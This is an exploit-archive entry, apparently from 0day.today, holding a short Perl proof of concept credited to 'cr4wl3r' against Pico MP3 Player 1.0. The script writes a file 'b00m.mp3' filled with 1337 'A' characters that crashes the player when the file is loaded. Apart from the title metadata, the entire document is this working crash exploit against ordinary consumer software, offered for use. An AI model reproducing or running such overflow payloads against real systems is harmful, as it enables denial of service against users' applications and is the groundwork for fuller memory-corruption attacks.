id: 10155
date: 01/22/2010
title: Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC
author: cr4wl3r
cves: 

=====================================================
Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC
=====================================================

#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.mp3 >>>BOOM
#########################################################
 
 
print "#####################################################\n";
print "[!] Pico MP3 Player 1.0 (.mp3) Local Crash PoC\n";
print "\n";
print "#####################################################\n";
 
 
my $boom = "A" x 1337;
my $filename = "b00m.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";



#  0day.today [2023-03-22]  #